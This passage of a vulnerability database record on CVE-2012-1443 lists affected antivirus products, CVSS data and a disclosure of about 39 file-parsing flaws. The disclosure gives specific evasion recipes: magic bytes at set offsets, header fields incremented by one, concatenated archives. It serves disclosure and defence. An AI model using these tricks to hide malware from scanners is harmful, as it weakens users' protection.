"vendor": "symantec", "version": "11.0" }, { "model": "avast antivirus", "scope": "eq", "trust": 1.0, "vendor": "alwil", "version": "5.0.677.0" }, { "model": "avast antivirus", "scope": "eq", "trust": 1.0, "vendor": "alwil", "version": "4.8.1351.0" }, { "model": "v3 internet security", "scope": "eq", "trust": 1.0, "vendor": "ahnlab", "version": "2011.01.18.00" }, { "model": "trend micro antivirus", "scope": "eq", "trust": 1.0, "vendor": "trendmicro", "version": "9.120.0.1004" }, { "model": "g data antivirus", "scope": "eq", "trust": 1.0, "vendor": "gdata", "version": "21" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "rising global", "version": "22.83.00.03" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "k7computing", "version": "9.77.3565" }, { "model": "nod32 antivirus", "scope": "eq", "trust": 1.0, "vendor": "eset", "version": "5795" }, { "model": "vba32", "scope": "eq", "trust": 1.0, "vendor": "anti virus", "version": "3.12.14.2" }, { "model": "antivirus", "scope": "eq", "trust": 1.0, "vendor": "nprotect", "version": "2011-01-17.01" }, { "model": "panda antivirus", "scope": "eq", "trust": 1.0, "vendor": "pandasecurity", "version": "10.0.2.7" }, { "model": "gateway", "scope": "eq", "trust": 1.0, "vendor": "mcafee", "version": "2010.1c" }, { "model": "antivirus \\\u0026 antispyware", "scope": "eq", "trust": 1.0, "vendor": "norman", "version": "6.06.12" }, { "model": "housecall", "scope": "eq", "trust": 1.0, "vendor": "trendmicro", "version": "9.120.0.1004" }, { "model": "quick heal", "scope": "eq", "trust": 1.0, "vendor": "cat", "version": "11.00" }, { "model": "f-prot antivirus", "scope": "eq", "trust": 1.0, "vendor": "f prot", "version": "4.6.2.117" }, { "model": "antivir", "scope": "eq", "trust": 1.0, "vendor": "avira", "version": "7.11.1.163" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "avast s r o", "version": "4.8.1351.0" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "avast s r o", "version": "5.0.677.0" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "avira", "version": "7.11.1.163" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "rising", "version": "22.83.00.03" }, { "model": "nod32 anti-virus", "scope": "eq", "trust": 0.8, "vendor": "eset", "version": "5795" }, { "model": "f-prot antivirus", "scope": "eq", "trust": 0.8, "vendor": "frisk", "version": "4.6.2.117" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "g data", "version": "21" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "k7 computing", "version": "9.77.3565" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "norman", "version": "6.06.12" }, { "model": "anti-virus", "scope": "eq", "trust": 0.8, "vendor": "nprotect", "version": "2011-01-17.01" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "panda security", "version": "10.0.2.7" }, { "model": "vba32", "scope": "eq", "trust": 0.8, "vendor": "virusblokada", "version": "3.12.14.2" }, { "model": "v3 internet security", "scope": "eq", "trust": 0.8, "vendor": "unlab", "version": "2011.01.18.00" }, { "model": "heal", "scope": "eq", "trust": 0.8, "vendor": "quick heal k k", "version": "11.00" }, { "model": "endpoint protection", "scope": "eq", "trust": 0.8, "vendor": "symantec", "version": "11" }, { "model": "antivirus", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "9.120.0.1004" }, { "model": "housecall", "scope": "eq", "trust": 0.8, "vendor": "trend micro", "version": "9.120.0.1004" }, { "model": "web gateway software", "scope": "eq", "trust": 0.8, "vendor": "mcafee", "version": "2010.1c" }, { "model": "vba32", "scope": "eq", "trust": 0.3, "vendor": "virusblokada", "version": "3.12.142" }, { "model": "virusbuster", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "13.6.1510" }, { "model": "trend micro", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "9.1201004" }, { "model": "housecall", "scope": "eq", "trust": 0.3, "vendor": "trend micro", "version": "9.1201004" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "symantec", "version": "20101.3103" }, { "model": "anti-virus", "scope": "eq", "trust": 0.3, "vendor": "sophos", "version": "4.61" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "rising", "version": "22.8303" }, { "model": "cat-quickheal", "scope": "eq", "trust": 0.3, "vendor": "quick heal", "version": "11.00" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "pctools", "version": "7.0.35" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "panda", "version": "10.0.27" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "norman", "version": "6.6.12" }, { "model": "mcafee-gw-edition 2010.1c", "scope": null, "trust": 0.3, "vendor": "mcafee", "version": null }, { "model": "computing pvt ltd k7antivirus", "scope": "eq", "trust": 0.3, "vendor": "k7", "version": "9.77.3565" }, { "model": "nprotect", "scope": "eq", "trust": 0.3, "vendor": "inca", "version": "2011-01-17.01" }, { "model": "antivirus t3.1.1.97.0", "scope": null, "trust": 0.3, "vendor": "ikarus", "version": null }, { "model": "data software gdata", "scope": "eq", "trust": 0.3, "vendor": "g", "version": "21" }, { "model": "software f-prot antivirus", "scope": "eq", "trust": 0.3, "vendor": "frisk", "version": "4.6.2117" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "fortinet", "version": "4.2.2540" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "f secure", "version": "9.0.16160.0" }, { "model": "nod32", "scope": "eq", "trust": 0.3, "vendor": "eset", "version": "5795" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "esafe", "version": "7.0.170" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "emsisoft", "version": "5.11" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "bitdefender", "version": "7.2" }, { "model": "antivir engine", "scope": "eq", "trust": 0.3, "vendor": "avira", "version": "7.11.1163" }, { "model": "anti-virus", "scope": "eq", "trust": 0.3, "vendor": "avg", "version": "10.01190" }, { "model": "avast5 antivirus", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "5.0.6770" }, { "model": "antivirus", "scope": "eq", "trust": 0.3, "vendor": "avast", "version": "4.8.1351.0" }, { "model": "command antivirus", "scope": "eq", "trust": 0.3, "vendor": "authentium", "version": "5.2.115" }, { "model": "antiy-avl", "scope": "eq", "trust": 0.3, "vendor": "antiy", "version": "2.0.37" }, { "model": "engine", "scope": "eq", "trust": 0.3, "vendor": "ahnlab", "version": "v32011.01.18.00" } ], "sources": [ { "db": "BID", "id": "52612" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "CNNVD", "id": "CNNVD-201203-407" }, { "db": "NVD", "id": "CVE-2012-1443" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:antiy:avl_sdk", "vulnerable": true }, { "cpe22Uri": "cpe:/a:authentium:command_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avast:avast_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avg:avg_anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:avira:antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:rising-global:rising_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:bitdefender:bitdefender", "vulnerable": true }, { "cpe22Uri": "cpe:/a:clamav:clamav", "vulnerable": true }, { "cpe22Uri": "cpe:/a:comodo:comodo_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:emsisoft:anti-malware", "vulnerable": true }, { "cpe22Uri": "cpe:/a:eset:nod32_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:f-prot:f-prot_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:gdata-software:g_data_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ikarus:ikarus_virus_utilities_t3_command_line_scanner", "vulnerable": true }, { "cpe22Uri": "cpe:/a:jiangmin:jiangmin_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:k7computing:antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:norman:norman_antivirus_%26_antispyware", "vulnerable": true }, { "cpe22Uri": "cpe:/a:nprotect:nprotect_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:pandasecurity:panda_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:pc_tools:pc_tools_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:anti-virus:vba32", "vulnerable": true }, { "cpe22Uri": "cpe:/a:virusbuster:virusbuster", "vulnerable": true }, { "cpe22Uri": "cpe:/a:aladdin:esafe", "vulnerable": true }, { "cpe22Uri": "cpe:/a:ahnlab:v3_internet_security", "vulnerable": true }, { "cpe22Uri": "cpe:/a:f-secure:anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:kaspersky:kaspersky_anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:quick_heal:quick_heal", "vulnerable": true }, { "cpe22Uri": "cpe:/a:symantec:endpoint_protection", "vulnerable": true }, { "cpe22Uri": "cpe:/a:sophos:anti-virus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:trendmicro:trend_micro_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:trendmicro:housecall", "vulnerable": true }, { "cpe22Uri": "cpe:/a:fortinet:fortinet_antivirus", "vulnerable": true }, { "cpe22Uri": "cpe:/a:microsoft:security_essentials", "vulnerable": true }, { "cpe22Uri": "cpe:/a:mcafee:scan_engine", "vulnerable": true }, { "cpe22Uri": "cpe:/a:mcafee:web_gateway", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001895" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Suman Jana and Vitaly Shmatikov", "sources": [ { "db": "BID", "id": "52612" } ], "trust": 0.3 }, "cve": "CVE-2012-1443", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "CVE-2012-1443", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "exploitabilityScore": 8.6, "id": "VHN-54724", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-1443", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-1443", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201203-407", "trust": 0.6, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-54724", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "VULHUB", "id": "VHN-54724" }, { "db": "JVNDB", "id": "JVNDB-2012-001895" }, { "db": "CNNVD", "id": "CNNVD-201203-407" }, { "db": "NVD", "id": "CVE-2012-1443" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations. Multiple products RAR A file parser contains a vulnerability that can prevent malware detection. Different RAR If it is announced that there is also a problem with the parser implementation, this vulnerability can be CVE May be split.By the attacker, MZ Has a character sequence starting with RAR Malware detection may be avoided via files. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Sophos Anti-Virus is a set of anti-virus software for various operating systems from Sophos, UK. The software detects and removes viruses, spyware, trojans and worms in real time, ensuring comprehensive network protection for desktops and laptops. Multiple file-parsing vulnerabilities leading to evasion in different antivirus(AV) products. All \naffected products are command-line versions of \nthe AVs. \n\n----------------------------\nVulnerability Descriptions\n----------------------------\n\n1. Specially crafted infected POSIX TAR files with \"[aliases]\" as first 9 bytes \n evades detection. \n\n Affected products -\n ClamAV 0.96.4, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1419\n\n2. Specially crafted infected POSIX TAR files with \"\\7fELF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n Fortinent 4.2.254.0, K7AntiVirus 9.77.3565, Kaspersky 7.0.0.125, \n Microsoft 1.6402, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1420\n\n3. Specially crafted infected POSIX TAR files with \"MSCF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Rising 22.83.00.03, \n Symantec 20101.3.0.103\n\n CVE no - \n CVE-2012-1421\n\n4. Specially crafted infected POSIX TAR files with \"ITSF\" as first 4 bytes \n evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, NOD32 5795, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1422\n\n5. Specially crafted infected POSIX TAR files with \"MZ\" as first 2 bytes \n evades detection. \n\n Affected products -\n Command 5.2.11.5, Emsisoft 5.1.0.1, F-Prot 4.6.2.117, Fortinent 4.2.254.0, \n Ikarus T3.1.1.97.0, K7AntiVirus 9.77.3565, NOD32 5795, Norman 6.06.12, \n PCTools 7.0.3.5, Rising 22.83.00.03, VirusBuster 13.6.151.0\n\n CVE no - \n CVE-2012-1423\n\n6. Specially crafted infected POSIX TAR files with \"\\19\\04\\00\\10\" at offset 8\n evades detection. \n\n Affected products -\n Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Jiangmin 13.0.900, Norman 6.06.12, \n PCTools 7.0.3.5, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1424\n\n\n7. Specially crafted infected POSIX TAR files with \"\\50\\4B\\03\\04\" as the first\n 4 bytes evades detection. \n\n Affected products -\n AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, CAT-QuickHeal 11.00, Emsisoft 5.1.0.1,\n Fortinet 4.2.254.0, Ikarus T3.1.1.97.0, Jiangmin 13.0.900, \n Kaspersky 7.0.0.125, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n NOD32 5795, Norman 6.06.12, PCTools 7.0.3.5, Symantec 20101.3.0.103, \n TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004 \n\n CVE no - \n CVE-2012-1425\n\n8. Specially crafted infected POSIX TAR files with \"\\42\\5A\\68\" as the first\n 3 bytes evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Command 5.2.11.5, F-Prot 4.6.2.117, \n K7AntiVirus 9.77.3565, Norman 6.06.12, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1426\n\n\n9. Specially crafted infected POSIX TAR files with \"\\57\\69\\6E\\5A\\69\\70\" at \n offset 29 evades detection. \n\n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1427\n\n10. Specially crafted infected POSIX TAR files with \"\\4a\\46\\49\\46\" at offset 6\n evades detection. \n \n Affected products -\n CAT-QuickHeal 11.00, Norman 6.06.12, Sophos 4.61.0\n\n CVE no - \n CVE-2012-1428\n\n11. Specially crafted infected ELF files with \"ustar\" at offset 257\n evades detection. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n F-Secure 9.0.16160.0, Ikarus T3.1.1.97.0, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01 \n\n CVE no - \n CVE-2012-1429\n12. Specially crafted infected ELF files with \"\\19\\04\\00\\10\" at offset 8 evades\n detection. \n\n Affected products -\n BitDefender 7.2, Comodo 7424, eSafe 7.0.17.0, F-Secure 9.0.16160.0, \n McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, nProtect 2011-01-17.01, \n Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1430\n13. Specially crafted infected ELF files with \"\\4a\\46\\49\\46\" at offset 6 evades\n detection. \n\n Affected products -\n BitDefender 7.2, Command 5.2.11.5, Comodo 7424, eSafe 7.0.17.0, \n F-Prot 4.6.2.117, F-Secure 9.0.16160.0, McAfee-GW-Edition 2010.1C, \n nProtect 2011-01-17.01, Sophos 4.61.0, Rising 22.83.00.03\n\n CVE no - \n CVE-2012-1431\n\n14. Specially crafted infected MS EXE files with \"\\57\\69\\6E\\5A\\69\\70\" at offset\n 29 evades detection. \n\n Affected products -\n Emsisoft 5.1.0.1, eSafe 7.0.17.0, Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1432\n\n15. Specially crafted infected MS EXE files with \"\\4a\\46\\49\\46\" at offset\n 6 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1433\n\n16. Specially crafted infected MS EXE files with \"\\19\\04\\00\\10\" at offset\n 8 evades detection. \n\n Affected products -\n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, \n Panda 10.0.2.7\n \n CVE no - \n CVE-2012-1434\n\n17. Specially crafted infected MS EXE files with \"\\50\\4B\\4C\\49\\54\\45\" at \n offset 30 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1435\n\n18. Specially crafted infected MS EXE files with \"\\2D\\6C\\68\" at \n offset 2 evades detection. \n \n Affected products - \n AhnLab-V3 2011.01.18.00, Emsisoft 5.1.0.1, eSafe 7.0.17.0, \n Ikarus T3.1.1.97.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1436\n\n19. Specially crafted infected MS Office files with \"\\50\\4B\\53\\70\\58\" at \n offset 526 evades detection. \n \n Affected products - \n Comodo 7425\n \n CVE no - \n CVE-2012-1437\n\n20. Specially crafted infected MS Office files with \"ustar\" at \n offset 257 evades detection. \n\n Affected products - \n Comodo 7425, Sophos 4.61.0 \n\n CVE no - \n CVE-2012-1438\n\n21. \u0027padding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s padding field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.17.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1439\n\n22. \u0027identsize\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s identsize field is incremented by 1 it evades\n detection. \n\n Affected products - \n Norman 6.06.12, eSafe 7.0.17.0, eTrust-Vet 36.1.8511, Fortinet 4.2.254.0, \n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1440\n\n23. \u0027e_ip\u0027 and \u0027e_res\u0027 field in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n Prevx 3.0\n\n \u0027e_minalloc\u0027, \u0027e_res2\u0027,\u0027e_cparhdr\u0027, \u0027e_crlc\u0027, \u0027e_lfarlc\u0027,\u0027e_maxalloc\u0027,\n \u0027e_oeminfo\u0027, \u0027e_ovno\u0027, \u0027e_cs\u0027, \u0027e_csum\u0027,\u0027e_sp\u0027, \u0027e_ss\u0027, \u0027e_cblp\u0027 and \n \u0027e_oemid\u0027 fields in MS EXE files are parsed incorrectly. \n If any of these fields in an infected MS EXE file is incremented by 1 \n it evades detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0\n\n\n CVE no - \n CVE-2012-1441\n\n24. \u0027class\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s class field is incremented by 1 it evades\n detection. \n\n Affected products - \n CAT-QuickHeal 11.00, McAfee 5.400.0.1158, McAfee-GW-Edition 2010.1C, \n eSafe 7.0.017.0, Kaspersky 7.0.0.125, F-Secure 9.0.16160.0, \n Sophos 4.61.0, Antiy-AVL 2.0.3.7, Rising 22.83.00.03, Fortinet 4.2.254.0, \n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1442\n\n25. Infected RAR files with initial two bytes set to \u0027MZ\u0027 can be fixed by the \n user and correctly extracted. Such a file evades detection. \n \n Affected products -\n ClamAV 0.96.4, Rising 22.83.00.03, CAT-QuickHeal 11.00, GData 21, \n Symantec 20101.3.0.103, Command 5.2.11.5, Ikarus T3.1.1.97.0, \n Emsisoft 5.1.0.1, PCTools 7.0.3.5, F-Prot 4.6.2.117, \n VirusBuster 13.6.151.0, Fortinent 4.2.254.0, Antiy-AVL 2.0.3.7, \n K7AntiVirus 9.77.3565, TrendMicro-HouseCall 9.120.0.1004,Kaspersky 7.0.0.125 \n Jiangmin 13.0.900. Microsoft 1.6402, Sophos 4.61.0, NOD32 5795, AntiVir 7.11.1.163, \n Norman 6.06.12, McAfee 5.400.0.1158, Panda 10.0.2.7, McAfee-GW-Edition 2010.1C, \n TrendMicro 9.120.0.1004, Comodo 7424, BitDefender 7.2, eSafe 7.0.17.0, F-Secure 9.0.16160.0\n nProtect 2011-01-17.01, AhnLab-V3 2011.01.18.00, AVG 10.0.0.1190, Avast 4.8.1351.0, \n Avast5 5.0.677.0, VBA32 3.12.14.2 \n\n CVE no - \n CVE-2012-1443\n\n26. \u0027abiversion\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abiversion field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Prevx 3.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1444\n\n27. \u0027abi\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s abi field is incremented by 1 it evades\n detection. \n\n Affected products - \n eSafe 7.0.017.0, Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1445\n\n28. \u0027encoding\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s encoding field is incremented by 1 it evades\n detection. \n\n Affected products - \n CAT-QuickHeal 11.00, McAfee 5.400.0.1158, Symantec 20101.3.0.103, \n Norman 6.06.12, eSafe 7.0.017.0, Kaspersky 7.0.0.125, \n McAfee-GW-Edition 2010.1C, Sophos 4.61.0, eTrust-Vet 36.1.8511, \n Antiy-AVL 2.0.3.7, PCTools 7.0.3.5, Rising 22.83.00.03, Fortinet 4.2.254.0,\n Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1446\n\n29. \u0027e_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s e_version field is incremented by 1 it evades\n detection. \n\n Affected products -\n Fortinet 4.2.254.0, eSafe 7.0.017.0, DrWeb 5.0.2.03300, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1447\n\n30. \u0027cbCabinet\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s cbCabinet field is incremented by 1 it evades\n detection. \n\n Affected products -\n CAT-QuickHeal 11.00, TrendMicro 9.120.0.1004, Ikarus T3.1.1.97.0\n TrendMicro-HouseCall 9.120.0.1004, Emsisoft 5.1.0.1 \n\n CVE no - \n CVE-2012-1448\n\n31. \u0027vMajor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s vMajor field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1449\n\n32. \u0027reserved3\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Sophos 4.61.0, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1450\n\n33. \u0027reserved2\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved2 field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0\n \n CVE no - \n CVE-2012-1451\n\n34. \u0027reserved1\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s reserved field is incremented by 1 it evades\n detection. \n\n Affected products -\n Emsisoft 5.1.0.1, Ikarus T3.1.1.97.0, CAT-QuickHeal 11.00\n \n CVE no - \n CVE-2012-1452\n\n35. \u0027coffFiles\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s coffFiles field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.2.03300, TrendMicro-HouseCall 9.120.0.1004, Kaspersky 7.0.0.125, \n Sophos 4.61.0, TrendMicro 9.120.0.1004, McAfee-GW-Edition 2010.1C,\n Emsisoft 5.1.0.1, eTrust-Vet 36.1.8511, Antiy-AVL 2.0.3.7, Microsoft 1.6402,\n Rising 22.83.00.03, Ikarus T3.1.1.97.0, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1453\n\n36. \u0027ei_version\u0027 field in ELF files is parsed incorrectly. \n If an infected ELF file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n McAfee 5.0.02.03300, eSafe 7.0.17.0, McAfee-GW-Edition 2010.1C, \n Rising 22.83.00.03, Fortinet 4.2.254.0, Panda 10.0.2.7\n\n CVE no - \n CVE-2012-1454\n\n37. \u0027vMinor\u0027 field in CAB files is parsed incorrectly. \n If an infected CAB file\u0027s version field is incremented by 1 it evades\n detection. \n\n Affected products -\n NOD32 5795, Rising 22.83.00.03\n \n CVE no - \n CVE-2012-1455\n\n38. A specially crafted ZIP file, created by concatenating the contents \n of a clean TAR archive and a virus-infected ZIP archive, is parsed \n incorrectly and evades detection. \n\n Affected products -\n AVG 10.0.0.1190, CAT-QuickHeal 11.00, Comodo 7424, Emsisoft 5.1.0.1,\n eSafe 7.0.17.0, F-Prot 4.6.2.117,Fortinent 4.2.254.0, Ikarus T3.1.1.97.0, \n Jiangmin 13.0.900, Kaspersky 7.0.0.125, McAfee 5.400.0.1158, \n McAfee-GW-Edition 2010.1C, NOD32 5795, Norman 6.06.12, Panda 10.0.2.7, \n Rising 22.83.00.03, Sophos 4.61.0, Symantec 20101.3.0.103, \n TrendMicro 9.120.0.1004, TrendMicro-HouseCall 9.120.0.1004\n\n CVE no - \n CVE-2012-1456\n\n39. If the length field in the header of a file with test EICAR virus\n included into a TAR archive is set to be greater than the archive\u0027s total \n length (1,000,000+original length in our experiments), the antivirus \n declares the file to be clean but virus gets extracted correctly by the \n GNU tar program. \n\n Affected products -\n AntiVir 7.11.1.163, Antiy-AVL 2.0.3.7, Avast 4.8.1351.0, 